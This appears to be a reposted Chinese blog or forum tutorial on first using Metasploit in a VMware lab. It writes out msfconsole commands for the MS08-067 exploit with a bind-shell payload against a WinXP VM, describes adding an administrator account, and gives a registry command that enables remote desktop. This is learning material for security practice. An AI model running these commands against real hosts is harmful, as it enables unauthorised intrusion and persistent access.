最近做某安全競賽平台的比賽,真正開始接觸Metasploit這一滲透神器,同時也是裝逼神器(2333….),下面記錄一下初步使用Metasploit的過程。
首先在百度百科摘錄了一段關於Metasploit Framework 的簡要介紹。
Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。當H.D. Moore在2003年發布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞。軟件廠商再也不能推遲發布針對已公布漏洞的補丁了,這是因為Metasploit團隊一直都在努力開發各種攻擊工具,並將它們貢獻給所有Metasploit用戶。
Metasploit的設計初衷是打造成一個攻擊工具開發平台,安全專家以及業余安全愛好者更多地將其當作一種點幾下鼠標就可以利用其中附帶的攻擊工具進行成功攻擊的環境。
說再多也不如真情實彈的干不是。
我用VMware搭建了一個實驗環境,下面是網絡的拓撲圖:
要做的就是用Kali Linux里的Metasploit入侵WinXP,然后從物理機,也就是Win7的遠程桌面連進WinXP 系統。
首先,在Kali用命令 msfconsole 開啟Metasploit。
然后運行如下命令:
use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程序
set LHOST 192.168.116.3 #設置本地主機IP
set RHOST 192.168.116.116 #設置目標主機IP
set payload windows/shell_bind_tcp #設置payload
show options #查看設置信息
exploit #實施攻擊
由圖可知,攻擊成功,我們得到了一個cmdshell,接下來就是新建賬戶了。
添加用戶名為zeal,密碼為zeal的用戶,並把zeal用戶添加到管理組。
接下來執行命令 netstat -an 看一下目標主機開放端口的情況。
發現並沒有開啟3389(遠程桌面連接端口),我們需要手動開啟。需要執行命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
然后,我們在物理機(Win7)運行 mstsc進行遠程桌面連接。
OK,成功入侵目標主機。
Metasploit 就是一款這么強大的工具,使滲透測試人員如虎添翼,幾個命令就入侵了目標主機。它的強大功能不言而喻。
接下來,我會繼續研究Metasploit的使用,並記錄自己的學習過程,希望能給各位一定的幫助。
轉自http://tieba.baidu.com/p/3715441716